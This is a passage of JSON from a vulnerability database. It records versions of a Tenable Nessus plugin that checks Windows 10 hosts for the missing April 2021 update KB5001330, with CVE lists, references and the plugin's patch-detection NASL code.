"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27094", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28341", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28321", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28344", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28334", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28446", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28335", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28355", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26415", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28320", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28337", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28439", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28310", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28322", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28357", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26417", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28330", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28346", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28309", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28313", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28315", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28444", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28312", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28332", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28319", "https://support.microsoft.com/en-us/help/5001330", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27089", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28327", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28354", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28328", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28440", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28317", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28343", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28314", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28436", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28318", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28325", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28438", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28336", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28352", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27096", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27072"], "cvelist": ["CVE-2021-26413", "CVE-2021-26415", "CVE-2021-26416", "CVE-2021-26417", "CVE-2021-27072", "CVE-2021-27079", "CVE-2021-27086", "CVE-2021-27088", "CVE-2021-27089", "CVE-2021-27090", "CVE-2021-27092", "CVE-2021-27093", "CVE-2021-27094", "CVE-2021-27095", "CVE-2021-27096", "CVE-2021-28309", "CVE-2021-28310", "CVE-2021-28311", "CVE-2021-28312", "CVE-2021-28313", "CVE-2021-28314", "CVE-2021-28315", "CVE-2021-28316", "CVE-2021-28317", "CVE-2021-28318", "CVE-2021-28319", "CVE-2021-28320", "CVE-2021-28321", "CVE-2021-28322", "CVE-2021-28323", "CVE-2021-28324", "CVE-2021-28325", "CVE-2021-28326", "CVE-2021-28327", "CVE-2021-28328", "CVE-2021-28329", "CVE-2021-28330", "CVE-2021-28331", "CVE-2021-28332", "CVE-2021-28333", "CVE-2021-28334", "CVE-2021-28335", "CVE-2021-28336", "CVE-2021-28337", "CVE-2021-28338", "CVE-2021-28339", "CVE-2021-28340", "CVE-2021-28341", "CVE-2021-28342", "CVE-2021-28343", "CVE-2021-28344", "CVE-2021-28345", "CVE-2021-28346", "CVE-2021-28347", "CVE-2021-28348", "CVE-2021-28349", "CVE-2021-28350", "CVE-2021-28351", "CVE-2021-28352", "CVE-2021-28353", "CVE-2021-28354", "CVE-2021-28355", "CVE-2021-28356", "CVE-2021-28357", "CVE-2021-28358", "CVE-2021-28434", "CVE-2021-28435", "CVE-2021-28436", "CVE-2021-28437", "CVE-2021-28438", "CVE-2021-28439", "CVE-2021-28440", "CVE-2021-28441", "CVE-2021-28442", "CVE-2021-28443", "CVE-2021-28444", "CVE-2021-28445", "CVE-2021-28446", "CVE-2021-28447"], "immutableFields": [], "lastseen": "2021-08-06T13:24:47", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["SMB_NT_MS21_APR_5001389.NASL", "SMB_NT_MS21_APR_VISUAL_STUDIO.NASL", "SMB_NT_MS21_APR_5001339.NASL", "SMB_NT_MS21_APR_5001335.NASL", "SMB_NT_MS21_APR_5001347.NASL", "SMB_NT_MS21_APR_5001387.NASL", "SMB_NT_MS21_APR_5001340.NASL", "SMB_NT_MS21_APR_5001382.NASL", "SMB_NT_MS21_APR_5001337.NASL", "SMB_NT_MS21_APR_5001342.NASL"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:452CCDC1AEFFF7056148871E86A6FE26"]}, {"type": "attackerkb", "idList": ["AKB:007C4393-6621-4656-8BFD-D0CFE64DCD65"]}, {"type": "cve", "idList": ["CVE-2021-27086", "CVE-2021-28438", "CVE-2021-28324", "CVE-2021-27092", "CVE-2021-28436", "CVE-2021-27088", "CVE-2021-28441", "CVE-2021-27079", "CVE-2021-27090", "CVE-2021-28314"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2021-26415/", "MSF:ILITIES/MSFT-CVE-2021-28325/", "MSF:ILITIES/MSFT-CVE-2021-28311/", "MSF:ILITIES/MSFT-CVE-2021-28318/", "MSF:ILITIES/MSFT-CVE-2021-28319/", "MSF:ILITIES/MSFT-CVE-2021-28440/", "MSF:ILITIES/MSFT-CVE-2021-26413/", "MSF:ILITIES/MSFT-CVE-2021-27079/"]}, {"type": "mskb", "idList": ["KB5001330"]}], "modified": "2021-08-06T13:24:47", "rev": 2}, "score": {"value": 5.7, "vector": "NONE", "modified": "2021-08-06T13:24:47", "rev": 2}}, "objectVersion": "1.6", "pluginID": "149259", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(149259);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/07/27\");\n\n script_cve_id(\n \"CVE-2021-26413\",\n \"CVE-2021-26415\",\n \"CVE-2021-26416\",\n \"CVE-2021-26417\",\n \"CVE-2021-27072\",\n \"CVE-2021-27079\",\n \"CVE-2021-27086\",\n \"CVE-2021-27088\",\n \"CVE-2021-27089\",\n \"CVE-2021-27090\",\n \"CVE-2021-27092\",\n \"CVE-2021-27093\",\n \"CVE-2021-27094\",\n \"CVE-2021-27095\",\n \"CVE-2021-27096\",\n \"CVE-2021-28309\",\n \"CVE-2021-28310\",\n \"CVE-2021-28311\",\n \"CVE-2021-28312\",\n \"CVE-2021-28313\",\n \"CVE-2021-28314\",\n \"CVE-2021-28315\",\n \"CVE-2021-28316\",\n \"CVE-2021-28317\",\n \"CVE-2021-28318\",\n \"CVE-2021-28319\",\n \"CVE-2021-28320\",\n \"CVE-2021-28321\",\n \"CVE-2021-28322\",\n \"CVE-2021-28323\",\n \"CVE-2021-28324\",\n \"CVE-2021-28325\",\n \"CVE-2021-28326\",\n \"CVE-2021-28327\",\n \"CVE-2021-28328\",\n \"CVE-2021-28329\",\n \"CVE-2021-28330\",\n \"CVE-2021-28331\",\n \"CVE-2021-28332\",\n \"CVE-2021-28333\",\n \"CVE-2021-28334\",\n \"CVE-2021-28335\",\n \"CVE-2021-28336\",\n \"CVE-2021-28337\",\n \"CVE-2021-28338\",\n \"CVE-2021-28339\",\n \"CVE-2021-28340\",\n \"CVE-2021-28341\",\n \"CVE-2021-28342\",\n \"CVE-2021-28343\",\n \"CVE-2021-28344\",\n \"CVE-2021-28345\",\n \"CVE-2021-28346\",\n \"CVE-2021-28347\",\n \"CVE-2021-28348\",\n \"CVE-2021-28349\",\n \"CVE-2021-28350\",\n \"CVE-2021-28351\",\n \"CVE-2021-28352\",\n \"CVE-2021-28353\",\n \"CVE-2021-28354\",\n \"CVE-2021-28355\",\n \"CVE-2021-28356\",\n \"CVE-2021-28357\",\n \"CVE-2021-28358\",\n \"CVE-2021-28434\",\n \"CVE-2021-28435\",\n \"CVE-2021-28436\",\n \"CVE-2021-28437\",\n \"CVE-2021-28438\",\n \"CVE-2021-28439\",\n \"CVE-2021-28440\",\n \"CVE-2021-28441\",\n \"CVE-2021-28442\",\n \"CVE-2021-28443\",\n \"CVE-2021-28444\",\n \"CVE-2021-28445\",\n \"CVE-2021-28446\",\n \"CVE-2021-28447\"\n );\n script_xref(name:\"MSKB\", value:\"5001330\");\n script_xref(name:\"IAVA\", value:\"2021-A-0168-S\");\n script_xref(name:\"MSFT\", value:\"MS21-5001330\");\n\n script_name(english:\"KB5001330: Windows 10 Version 2004 / Windows 10 Version 20H2 Security Update (April 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing a security update. Note that\nNessus has not tested for this issue but has instead relied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5001330\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released KB5001330 to address this issue.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-27092\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/05/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nvar bulletin, kbs, share;\n\nbulletin = 'MS21-04';\nkbs = make_list(\n '5001330'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'19041',\n rollup_date:'04_2021',\n bulletin:bulletin,\n rollup_kb_list:[5001330])\n||\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'19042',\n rollup_date:'04_2021',\n bulletin:bulletin,\n rollup_kb_list:[5001330])\n)\n\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "naslFamily": "Windows : Microsoft Bulletins", "cpe": ["cpe:/o:microsoft:windows"], "solution": "Microsoft has released KB5001330 to address this issue.", "nessusSeverity": "", "cvssScoreSource": "CVE-2021-27092", "vpr": {"risk factor": "Critical", "score": "9.5"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2021-04-13T00:00:00", "vulnerabilityPublicationDate": "2021-04-13T00:00:00", "exploitableWith": []}, "lastseen": "2021-08-06T13:24:47", "differentElements": ["vpr"], "edition": 7}, {"bulletin": {"id": "SMB_NT_MS21_APR_5001330.NASL", "hash": "08af503d92526c11bdcdb167139d1c0d", "type": "nessus", "bulletinFamily": "scanner", "title": "KB5001330: Windows 10 Version 2004 / Windows 10 Version 20H2 Security Update (April 2021)", "description": "The remote Windows host is missing a security update. Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2021-05-05T00:00:00", "modified": "2021-07-27T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/149259", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28357", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28442", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28358", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28354", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28438", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28314", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28338", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26413", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27096", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28353", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28348", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26417", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28439", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28355", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28445", "https://support.microsoft.com/en-us/help/5001330", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28340", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28444", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27079", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28333", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28331", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28312", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28309", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27072", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27094", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28344", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28341", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28328", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28441", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28327", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28316", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28319", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28336", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28343", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28339", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27090", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28342", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26416", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27088", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28351", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28320", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28349", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28435", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28345", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27092", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28321", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28447", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28346", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28446", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28335", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28347", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28443", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27089", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28437", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28322", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28310", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28325", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28332", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28313", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28436", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27095", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28350", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28329", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28337", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28330", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28326", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27086", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28323", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28324", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27093", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28315", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28317", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28334", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28434", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28352", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28311", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28440", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28356", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28318", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26415"], "cvelist": ["CVE-2021-26413", "CVE-2021-26415", "CVE-2021-26416", "CVE-2021-26417", "CVE-2021-27072", "CVE-2021-27079", "CVE-2021-27086", "CVE-2021-27088", "CVE-2021-27089", "CVE-2021-27090", "CVE-2021-27092", "CVE-2021-27093", "CVE-2021-27094", "CVE-2021-27095", "CVE-2021-27096", "CVE-2021-28309", "CVE-2021-28310", "CVE-2021-28311", "CVE-2021-28312", "CVE-2021-28313", "CVE-2021-28314", "CVE-2021-28315", "CVE-2021-28316", "CVE-2021-28317", "CVE-2021-28318", "CVE-2021-28319", "CVE-2021-28320", "CVE-2021-28321", "CVE-2021-28322", "CVE-2021-28323", "CVE-2021-28324", "CVE-2021-28325", "CVE-2021-28326", "CVE-2021-28327", "CVE-2021-28328", "CVE-2021-28329", "CVE-2021-28330", "CVE-2021-28331", "CVE-2021-28332", "CVE-2021-28333", "CVE-2021-28334", "CVE-2021-28335", "CVE-2021-28336", "CVE-2021-28337", "CVE-2021-28338", "CVE-2021-28339", "CVE-2021-28340", "CVE-2021-28341", "CVE-2021-28342", "CVE-2021-28343", "CVE-2021-28344", "CVE-2021-28345", "CVE-2021-28346", "CVE-2021-28347", "CVE-2021-28348", "CVE-2021-28349", "CVE-2021-28350", "CVE-2021-28351", "CVE-2021-28352", "CVE-2021-28353", "CVE-2021-28354", "CVE-2021-28355", "CVE-2021-28356", "CVE-2021-28357", "CVE-2021-28358", "CVE-2021-28434", "CVE-2021-28435", "CVE-2021-28436", "CVE-2021-28437", "CVE-2021-28438", "CVE-2021-28439", "CVE-2021-28440", "CVE-2021-28441", "CVE-2021-28442", "CVE-2021-28443", "CVE-2021-28444", "CVE-2021-28445", "CVE-2021-28446", "CVE-2021-28447"], "immutableFields": [], "lastseen": "2021-08-07T15:43:01", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["SMB_NT_MS21_APR_5001339.NASL", "SMB_NT_MS21_APR_5001337.NASL", "SMB_NT_MS21_APR_5001382.NASL", "SMB_NT_MS21_APR_VISUAL_STUDIO.NASL", "SMB_NT_MS21_APR_5001340.NASL", "SMB_NT_MS21_APR_5001347.NASL", "SMB_NT_MS21_APR_5001387.NASL", "SMB_NT_MS21_APR_5001342.NASL", "SMB_NT_MS21_APR_5001389.NASL", "SMB_NT_MS21_APR_5001335.NASL"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:452CCDC1AEFFF7056148871E86A6FE26"]}, {"type": "attackerkb", "idList": ["AKB:007C4393-6621-4656-8BFD-D0CFE64DCD65"]}, {"type": "cve", "idList": ["CVE-2021-27086", "CVE-2021-28441", "CVE-2021-28438", "CVE-2021-28436", "CVE-2021-28324", "CVE-2021-28435", "CVE-2021-28314", "CVE-2021-27090", "CVE-2021-27079", "CVE-2021-27092"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2021-26413/", "MSF:ILITIES/MSFT-CVE-2021-26415/", "MSF:ILITIES/MSFT-CVE-2021-28440/", "MSF:ILITIES/MSFT-CVE-2021-27079/", "MSF:ILITIES/MSFT-CVE-2021-28319/", "MSF:ILITIES/MSFT-CVE-2021-28311/", "MSF:ILITIES/MSFT-CVE-2021-28325/", "MSF:ILITIES/MSFT-CVE-2021-28318/"]}, {"type": "mskb", "idList": ["KB5001330"]}], "modified": "2021-08-07T15:43:01", "rev": 2}, "score": {"value": 5.7, "vector": "NONE", "modified": "2021-08-07T15:43:01", "rev": 2}}, "objectVersion": "1.6", "pluginID": "149259", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(149259);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/07/27\");\n\n script_cve_id(\n \"CVE-2021-26413\",\n \"CVE-2021-26415\",\n \"CVE-2021-26416\",\n \"CVE-2021-26417\",\n \"CVE-2021-27072\",\n \"CVE-2021-27079\",\n \"CVE-2021-27086\",\n \"CVE-2021-27088\",\n \"CVE-2021-27089\",\n \"CVE-2021-27090\",\n \"CVE-2021-27092\",\n \"CVE-2021-27093\",\n \"CVE-2021-27094\",\n \"CVE-2021-27095\",\n \"CVE-2021-27096\",\n \"CVE-2021-28309\",\n \"CVE-2021-28310\",\n \"CVE-2021-28311\",\n \"CVE-2021-28312\",\n \"CVE-2021-28313\",\n \"CVE-2021-28314\",\n \"CVE-2021-28315\",\n \"CVE-2021-28316\",\n \"CVE-2021-28317\",\n \"CVE-2021-28318\",\n \"CVE-2021-28319\",\n \"CVE-2021-28320\",\n \"CVE-2021-28321\",\n \"CVE-2021-28322\",\n \"CVE-2021-28323\",\n \"CVE-2021-28324\",\n \"CVE-2021-28325\",\n \"CVE-2021-28326\",\n \"CVE-2021-28327\",\n \"CVE-2021-28328\",\n \"CVE-2021-28329\",\n \"CVE-2021-28330\",\n \"CVE-2021-28331\",\n \"CVE-2021-28332\",\n \"CVE-2021-28333\",\n \"CVE-2021-28334\",\n \"CVE-2021-28335\",\n \"CVE-2021-28336\",\n \"CVE-2021-28337\",\n \"CVE-2021-28338\",\n \"CVE-2021-28339\",\n \"CVE-2021-28340\",\n \"CVE-2021-28341\",\n \"CVE-2021-28342\",\n \"CVE-2021-28343\",\n \"CVE-2021-28344\",\n \"CVE-2021-28345\",\n \"CVE-2021-28346\",\n \"CVE-2021-28347\",\n \"CVE-2021-28348\",\n \"CVE-2021-28349\",\n \"CVE-2021-28350\",\n \"CVE-2021-28351\",\n \"CVE-2021-28352\",\n \"CVE-2021-28353\",\n \"CVE-2021-28354\",\n \"CVE-2021-28355\",\n \"CVE-2021-28356\",\n \"CVE-2021-28357\",\n \"CVE-2021-28358\",\n \"CVE-2021-28434\",\n \"CVE-2021-28435\",\n \"CVE-2021-28436\",\n \"CVE-2021-28437\",\n \"CVE-2021-28438\",\n \"CVE-2021-28439\",\n \"CVE-2021-28440\",\n \"CVE-2021-28441\",\n \"CVE-2021-28442\",\n \"CVE-2021-28443\",\n \"CVE-2021-28444\",\n \"CVE-2021-28445\",\n \"CVE-2021-28446\",\n \"CVE-2021-28447\"\n );\n script_xref(name:\"MSKB\", value:\"5001330\");\n script_xref(name:\"IAVA\", value:\"2021-A-0168-S\");\n script_xref(name:\"MSFT\", value:\"MS21-5001330\");\n\n script_name(english:\"KB5001330: Windows 10 Version 2004 / Windows 10 Version 20H2 Security Update (April 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing a security update. Note that\nNessus has not tested for this issue but has instead relied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5001330\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released KB5001330 to address this issue.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-27092\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/05/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nvar bulletin, kbs, share;\n\nbulletin = 'MS21-04';\nkbs = make_list(\n '5001330'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) 